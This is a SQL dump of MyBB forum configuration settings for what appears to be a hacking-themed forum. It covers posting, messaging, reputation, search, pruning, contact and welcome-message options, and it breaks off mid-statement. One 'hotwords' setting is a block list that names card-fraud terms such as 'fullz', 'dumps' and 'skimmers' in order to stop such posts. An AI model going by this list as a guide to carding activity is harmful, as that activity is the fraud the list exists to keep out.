INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('131', 'maxpostvideos', 'Maximum Videos per Post', 'Enter the maximum number of videos a user can put in their post. Set to 0 to disable this.', 'text', '3', '14', '13', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('132', 'subscribeexcerpt', 'Amount of Characters for Subscription Previews', 'How many characters of the post do you want to send with the email notification of a new reply?', 'text', '100', '15', '13', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('133', 'maxattachments', 'Maximum Attachments Per Post', 'The maximum number of attachments a user is allowed to upload per post.', 'text', '5', '16', '13', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('134', 'attachthumbnails', 'Show Attached Thumbnails in Posts', 'How do you want images to be shown in posts?', 'radio yes=Thumbnail no=Full Size Image download=As Download Link', 'yes', '17', '13', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('135', 'attachthumbh', 'Attached Thumbnail Maximum Height', 'Enter the height that attached thumbnails should be generated at.', 'text', '96', '18', '13', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('136', 'attachthumbw', 'Attached Thumbnail Maximum Width', 'Enter the width that attached thumbnails should be generated at.', 'text', '96', '19', '13', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('137', 'edittimelimit', 'Edit Time Limit', 'The number of minutes until regular users cannot edit their own posts (if they have the permission). Enter 0 (zero) for no limit.', 'text', '', '20', '13', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('138', 'wordwrap', 'Number of Characters before Word Wrapping Occurs', 'The maximum number of characters that can be present in a word before a space is automatically inserted. (helps preservation of the forum layout). Set to 0 to disable.', 'text', '80', '21', '13', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('139', 'maxquotedepth', 'Maximum Nested Quote Tags', 'The maximum depth level for quote tags. When quote-replying to a post, all nested quotes which exceed this threshold are automatically removed. Note that this value is only enforced when quote-replying - it is still possible to manually enter quotes to exceed this limit, and this setting will not affect posts already submitted. Set to 0 to disable.', 'text', '5', '22', '13', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('140', 'polloptionlimit', 'Maximum Poll Option Length', 'The maximum length that each poll option can be. (Set to 0 to disable).', 'text', '250', '23', '13', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('141', 'maxpolloptions', 'Maximum Number of Poll Options', 'The maximum number of options for polls that users can post.', 'text', '10', '24', '13', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('142', 'threadreview', 'Show Thread Review', 'Show recent posts when creating a new reply?', 'yesno', '1', '25', '13', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('143', 'enablepms', 'Enable Private Messaging Functionality', 'If you wish to disable the private messaging system on your board, set this option to no.', 'yesno', '1', '1', '14', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('144', 'pmsallowhtml', 'Allow HTML', 'Selecting yes will allow HTML to be used in private messages.', 'yesno', '0', '2', '14', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('145', 'pmsallowmycode', 'Allow MyCode', 'Selecting yes will allow MyCode to be used in private messages.', 'yesno', '1', '3', '14', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('146', 'pmsallowsmilies', 'Allow Smilies', 'Selecting yes will allow Smilies to be used in private messages.', 'yesno', '1', '4', '14', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('147', 'pmsallowimgcode', 'Allow [img] Code', 'Selecting yes will allow [img] Code to be used in private messages.', 'yesno', '0', '5', '14', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('148', 'pmsallowvideocode', 'Allow [video] Code', 'Selecting yes will allow [video] Code to be used in private messages.', 'yesno', '0', '6', '14', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('149', 'pmfloodsecs', 'Private Message Flood Time', 'Set the time (in seconds) users have to wait between sending messages, to be in effect; set to 0 to disable.', 'text', '30', '7', '14', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('150', 'enablereputation', 'Enable Reputation Functionality', 'If you wish to disable the reputation system on your board, set this option to no.', 'yesno', '1', '1', '15', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('151', 'posrep', 'Allow Positive Reputation', 'Allow users to give others positive reputation?', 'yesno', '1', '2', '15', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('152', 'negrep', 'Allow Negative Reputation', 'Allow users to give others negative reputation?', 'yesno', '1', '3', '15', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('153', 'neurep', 'Allow Neutral Reputation', 'Allow users to give others neutral reputation?', 'yesno', '1', '4', '15', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('154', 'multirep', 'Allow Multiple Reputation', 'Can users give multiple reputations to the same user?<br />Note: Does not effect \"Post\" reputation', 'yesno', '0', '5', '15', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('155', 'postrep', 'Allow Post Reputations', 'Enable reputation to be linked to posts?', 'yesno', '0', '6', '15', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('156', 'repsperpage', 'Reputation Comments Per Page', 'Here you can enter the number of reputation comments to show per page on the reputation system', 'text', '15', '7', '15', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('157', 'maxreplength', 'Maximum Reputation Length', 'The maximum number of characters a reputation can be.', 'text', '150 ', '8', '15', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('158', 'searchtype', 'Search Type', 'Please select the type of search system you wish to use. You can either chose between \"Standard\", or \"Full Text\" (depending on your database). Fulltext searching is more powerful than the standard MyBB searching and quicker too.', 'php <select name=\\\"upsetting[{$setting[\'name\']}]\\\"><option value=\\\"standard\\\">\".($lang->setting_searchtype_standard?$lang->setting_searchtype_standard:\"Standard\").\"</option>\".($db->supports_fulltext(\"threads\") && $db->supports_fulltext_boolean(\"posts\")?\"<option value=\\\"fulltext\\\"\".($setting[\'value\']==\"fulltext\"?\" selected=\\\"selected\\\"\":\"\").\">\".($lang->setting_searchtype_fulltext?$lang->setting_searchtype_fulltext:\"Full Text\").\"</option>\":\"\").\"</select>', 'standard', '1', '16', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('159', 'searchfloodtime', 'Search Flood Time (seconds)', 'Enter the time in seconds for the minimum allowed interval for searching. This prevents users from overloading your server by constantly performing searches. Set to 0 to disable.', 'text', '30', '2', '16', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('160', 'minsearchword', 'Minimum Search Word Length', 'Enter the minimum number of characters an individual word in a search query can be. Set to 0 to disable (and accept the hard limit default of 3 for standard searching and 4 for MySQL fulltext searching). If you use MySQL fulltext searching and set this lower than the MySQL setting - MySQL will override it.', 'text', '2', '3', '16', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('161', 'searchhardlimit', 'Hard Limit for Maximum Search Results', 'Enter the maximum amount of results to be processed. Set to 0 to disable. On larger boards (more than 1 million posts) this should be set to no more than 1000.', 'text', '100', '4', '16', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('162', 'seourls', 'Enable search engine friendly URLs?', 'Search engine friendly URLs change the MyBB links to shorter URLs which search engines prefer and are easier to type. showthread.php?tid=1 becomes thread-1.html. <strong>Once this setting is enabled you need to make sure you have the MyBB .htaccess in your MyBB root directory (or the equivalent for your web server). Automatic detection may not work on all servers.</strong> Please see <a href=\"http://wiki.mybb.com/index.php/SEF_URLS\">The MyBB wiki</a> for assistance.', 'select auto=Automatic Detection yes=Enabled no=Disabled', 'auto', '1', '17', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('163', 'seourls_archive', 'Enable search engine friendly URLs in Archive?', 'Search engine friendly URLs can be used in the archive. <strong>Once this setting is enabled ensure the archive still works as expected.</strong>', 'yesno', '1', '2', '17', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('164', 'gzipoutput', 'Use GZip Page Compression?', 'Do you want to compress pages in GZip format when they are sent to the browser? This means quicker downloads for your visitors, and less traffic usage for you.', 'yesno', '1', '3', '17', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('165', 'gziplevel', 'GZip Page Compression Level', 'Set the level for GZip Page Compression from 0-9. (0=no compression, 9=maximum compression). This will only take effect if GZip Page Compression is enabled above and if your PHP version is newer than 4.2. If you use an older version of PHP, the default compression level of the zlib library will be used instead.', 'text', '4', '4', '17', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('166', 'nocacheheaders', 'Send No Cache Headers', 'With this option you can prevent caching of the page by the browser.', 'yesno', '0', '5', '17', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('167', 'redirects', 'Friendly Redirection Pages', 'This will enable friendly redirection pages instead of bumping the user directly to the page.', 'onoff', '0', '6', '17', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('168', 'load', '*NIX Load Limiting', 'Limit the maximum server load before MyBB rejects people. 0 for none. Recommended limit is 5.0.', 'text', '0', '7', '17', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('169', 'tplhtmlcomments', 'Output template start/end comments?', 'This will enable or disable the output of template start/end comments in the HTML.', 'yesno', '1', '8', '17', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('170', 'use_xmlhttprequest', 'Enable XMLHttp request features?', 'This will enable or disable the XMLHttp request features.', 'yesno', '1', '9', '17', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('171', 'extraadmininfo', 'Advanced Stats / Debug information', 'Shows Server load, parse time, generation time, Gzip compression, etc on the bottom of all pages in the root folder. Please note that only administrators see this information.', 'yesno', '1', '10', '17', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('172', 'uploadspath', 'Uploads Path', 'The path used for all board uploads. It <b>must be chmod 777</b> (on Unix servers).', 'text', './uploads', '11', '17', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('173', 'useerrorhandling', 'Use Error Handling', 'If you do not wish to use the integrated error handling for MyBB, you may turn this option off. However, it is reccommended that it stay on', 'onoff', '1', '12', '17', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('174', 'errorlogmedium', 'Error Logging Medium', 'The type of the error handling to use.', 'select none=Neither log=Log errors email=Email errors both=Log and email errors ', 'both', '13', '17', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('175', 'errortypemedium', 'Error Type Medium', 'The type of errors to show.', 'select warning=Warnings error=Errors both=Warnings and Errors none=Hide Errors and Warnings ', 'both', '14', '17', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('176', 'errorloglocation', 'Error Logging Location', 'The location of the log to send errors to, if specified.', 'text', './error.log', '15', '17', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('177', 'enableforumjump', 'Enable Forum Jump Menu?', 'The forum jump menu is shown on the forum and thread view pages. It can add significant load to your forums if you have a large amount of forums. Set to \'No\' to disable it.', 'yesno', '0', '16', '17', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('178', 'ip_forwarded_check', 'Scrutinize User\'s IP address?', 'Do you want to check a user\'s IP address for HTTP_X_FORWARDED_FOR or HTTP_X_REAL_IP headers? If you\'re unsure, set this to no.', 'yesno', '1', '17', '17', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('179', 'postlayout', 'Post Layout', 'Allows you to switch between the classic and new horizontal layout modes. Classic mode shows the author information to the left of the post, horizontal shows the author information above the post.', 'radio horizontal=Display posts using the horizontal post layout classic=Display posts using the classic layout', 'horizontal', '1', '18', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('180', 'postsperpage', 'Posts Per Page:', 'The number of posts to display per page. We recommend its not higher than 20 for people with slower connections.', 'text', '10', '2', '18', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('181', 'userpppoptions', 'User Selectable Posts Per Page', 'If you would like to allow users to select how many posts are shown per page in a thread, enter the options they should be able to select separated with commas. If this is left blank they will not be able to choose how many posts are shown per page.', 'text', '5,10,20,25,30,40,50', '3', '18', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('182', 'postmaxavatarsize', 'Maximum Avatar Dimensions in Posts', 'The maximum dimensions for avatars when being displayed in a post. If an avatar is too large, it will automatically be scaled down.', 'text', '70x70', '4', '18', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('183', 'threadreadcut', 'Read Threads in Database (Days)', 'The number of days that you wish to keep thread read information in the database. For large boards, we do not recommend a high number as the board will become slower. Set to 0 to disable.', 'text', '5', '5', '18', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('184', 'threadusenetstyle', 'Usenet Style Thread View', 'Selecting yes will cause posts to look similar to how posts look in USENET. No will cause posts to look the modern way.', 'yesno', '0', '6', '18', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('185', 'quickreply', 'Show Quick Reply Form', 'Allows you to set whether or not the quick reply form will be shown at the bottom of threads.', 'onoff', '1', '7', '18', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('186', 'multiquote', 'Show Multi-quote Buttons', 'The multi-quote button allows users to select a series of posts then click Reply and have those posts quoted in their message.', 'onoff', '0', '8', '18', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('187', 'showsimilarthreads', 'Show \'Similar Threads\' Table', 'The Similar Threads table shows threads that are relevant to the thread being read. You can set the relevancy below.', 'yesno', '0', '9', '18', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('188', 'similarityrating', 'Similar Threads Relevancy Rating', 'This allows you to limit similar threads to ones more relevant (0 being not relevant). This number should not be over 10 and should not be set low (<5) for large forums. Does not apply to PgSQL databases.', 'text', '1', '10', '18', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('189', 'similarlimit', 'Similar Threads Limit', 'Here you can change the total amount of similar threads to be shown in the similar threads table. It is recommended that it is not over 15 for 56k users.', 'text', '10', '11', '18', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('190', 'showforumpagesbreadcrumb', 'Show Forum Multipage Dropdown', 'If the forum has more than 1 page of threads, do you want to display a dropdown pagination menu in the breadcrumbs?', 'yesno', '1', '12', '18', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('191', 'browsingthisthread', 'Users Browsing this Thread', 'Here you can turn off the \'users browsing this thread\' feature.', 'yesno', '0', '13', '18', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('192', 'delayedthreadviews', 'Delayed Thread View Updates', 'If this setting is enabled, the number of thread views for threads will be updated in the background by the task schedule system. If not enabled, thread view counters are incremented instantly.', 'onoff', '0', '14', '18', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('193', 'enablewarningsystem', 'Enable Warning System?', 'Set to no to completely disable the warning system.', 'yesno', '1', '1', '19', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('194', 'allowcustomwarnings', 'Allow Custom Warning Types?', 'Allow a custom reason and amount of points to be specified by those with permissions to warn users.', 'yesno', '1', '2', '19', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('195', 'canviewownwarning', 'Can Users View Own Warnings?', 'Set to yes to allow users to view recent warnings in their User CP and show their warning level to them in their profile.', 'yesno', '1', '3', '19', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('196', 'maxwarningpoints', 'Maximum Warning Points', 'The maximum warning points that can be given to a user before it is considered a warning level of 100%.', 'text', '100', '4', '19', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('197', 'wolcutoffmins', 'Cut-off Time (mins)', 'The number of minutes before a user is marked offline. Recommended: 15.', 'text', '15', '1', '20', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('198', 'refreshwol', 'Refresh Who\'s online page Time (mins)', 'The number of minutes before the \"Who\'s online\" page refreshes. 0 is disabled.', 'text', '5', '16', '20', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('199', 'enablepruning', 'Enable user pruning?', 'Set to on to prune users by the specified criteria below.', 'onoff', '0', '1', '21', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('200', 'enableprunebyposts', 'Prune user by post count?', 'Set to on to prune users by their number of posts.', 'onoff', '0', '2', '21', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('201', 'prunepostcount', 'Post count to prune by', 'Set to prune users less then a specified number of posts.', 'text', '0', '3', '21', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('202', 'dayspruneregistered', 'Days registered before pruning by post count', 'Set to prune users whom have been registered for atleast the given amount of days.', 'text', '90', '4', '21', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('203', 'pruneunactived', 'Prune unactivated users?', 'Set to on to prune users whom are unactived.', 'onoff', '1', '5', '21', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('204', 'dayspruneunactivated', 'Days registered before pruning unactivated users', 'Set to prune users whom have been unactived for atleast the given amount of days.', 'text', '20', '6', '21', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('205', 'prunethreads', 'Prune User Posts/Threads', 'For the users that are going to be removed, do you want to remove all of their posts/threads?', 'yesno', '0', '7', '21', '1'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('206', 'selfclosegids', 'Self Close Groups', 'Which groups are allowed to close their own threads? Seperate each gid with a comma.(0=disabled)', 'text', '9,3,4', '41', '13', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('207', 'selfopengids', 'Self Open Groups', 'Which groups are allowed to open their own threads? Seperate each gid with a comma.(0=disabled)', 'text', '0', '42', '13', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('208', 'contact_email', 'Email', 'What email address will contact be sent to?', 'text', 'support@l33thacking.net', '1', '22', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('209', 'contact_guests', 'Allow Guest Contact', 'Select yes to give guests the ability to use the contact form.', 'yesno', '1', '2', '22', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('210', 'contact_subjects', 'Contact Subjects', 'These are the possible subject choices please seperate each one with a comma.', 'textarea', 'Registration Problem, Stolen/Lost Account, Error(s) or Unable to access LH, Question, Advertising, DMCA, Other', '3', '22', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('211', 'contact_type', 'Contact Type', 'How would you prefer to be contacted?', 'select contactpm= PM Contact contactemail= Email Contact', 'contactemail', '4', '22', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('212', 'contact_pmuser', 'Contact PM Username', 'What is the username of the member for PMs if you have chosen PM contact above?', 'text', 'username', '5', '22', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('213', 'hotwords', 'Hot Words', 'These are words that will stop a post or thread. Separate each one with a comma.', 'text', 'anarchy, suck, skimmed, card, atm, fullz, skimmers, dumps, visa, mastercard, dumps, bank, tooshort, suck, dick, pussy, vagina, selling, trade, porn, bitch, paypal, cunt, scam', '25', '13', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('243', 'hellban_group', 'Usergroup to have hellbanned', 'The group ID of the usergroup to be hellbanned. Have \"x\" (no quotes) to disable plugin.', 'text', '10', '1', '26', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('244', 'g33k_welcomepm_enabled', 'Enable/Disable', 'Enable/Disable the sending of Welcome PMs/Emails. <script type=\"text/javascript\"> function insertText(value, textarea) { // Internet Explorer if(document.selection) { textarea.focus(); var selection = document.selection.createRange(); selection.text = value; } // Firefox else if(textarea.selectionStart || textarea.selectionStart == \'0\') { var start = textarea.selectionStart; var end = textarea.selectionEnd; textarea.value = textarea.value.substring(0, start) + value + textarea.value.substring(end, textarea.value.length); } else { textarea.value += value; } } </script>', 'onoff', '1', '1', '27', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('245', 'g33k_welcomepm_method', 'PM or Mail or Both', 'Choose whether to send a PM or an Email or both PM and Email.', 'select pm=PM email=Email both=Both', 'pm', '2', '27', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('246', 'g33k_welcomepm_sendwhen', 'When to send the PM/Email', 'Choose when you want to send the PM/Email.<br />This setting is dependent on the Registration Method and whether account creation is instant or requires activation.', 'select activation=Send upon Account Activation register=Send on Registration', 'activation', '3', '27', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('247', 'g33k_welcomepm_pm_sender', 'PM Sender User ID', 'Enter the User ID of the user to send the PM from.<br />This setting is only used when sending PMs. Emails are sent using the board settings.', 'text', '1', '4', '27', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('248', 'g33k_welcomepm_subject', 'Subject', 'Enter the Subject of the PM/Email to be sent.<br />You can personalize the subject by inserting the user\'s username, board name or board url using the personalize links below.<br /><br /><script type=\"text/javascript\"> <!-- document.write(\'Personalize: [<a href=\"#\" onclick=\"insertText(\\\'{username}\\\', $(\\\'setting_g33k_welcomepm_subject\\\')); return false;\">Username</a>], [<a href=\"#\" onclick=\"insertText(\\\'{bbname}\\\', $(\\\'setting_g33k_welcomepm_subject\\\')); return false;\">Board Name</a>], [<a href=\"#\" onclick=\"insertText(\\\'{bburl}\\\', $(\\\'setting_g33k_welcomepm_subject\\\')); return false;\">Board URL</a>]\'); </script> ', 'textarea', 'Welcome to {bbname}!', '5', '27', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('249', 'g33k_welcomepm_message', 'Content', 'Enter the Content of the PM/Email to be sent.<br />You can personalize the message by inserting the user\'s username, board name or board url using the personalize links below.<br /><br /><script type=\"text/javascript\"> <!-- document.write(\'Personalize: [<a href=\"#\" onclick=\"insertText(\\\'{username}\\\', $(\\\'setting_g33k_welcomepm_message\\\')); return false;\">Username</a>], [<a href=\"#\" onclick=\"insertText(\\\'{bbname}\\\', $(\\\'setting_g33k_welcomepm_message\\\')); return false;\">Board Name</a>], [<a href=\"#\" onclick=\"insertText(\\\'{bburl}\\\', $(\\\'setting_g33k_welcomepm_message\\\')); return false;\">Board URL</a>]\'); </script> ', 'textarea', 'Welcome to our forum {username}. I am the founder of the L33THacking, if you have any problems or have any questions then feel free to contact any Staff member from our [url=http://l33thacking.net/showteam.php]Staff list[/url]. Feel free to view our [url=http://l33thacking.net/misc.php?action=help]Help Documents[/url] because answers to most of your questions can be found in the Help Documents. Hope you enjoy our forums. {bbname} {bburl}', '6', '27', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('254', 'dp_title', 'Donation Page Title', 'This is the display title of your donation page.', 'text', 'Elite Upgrade Page', '1', '29', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES 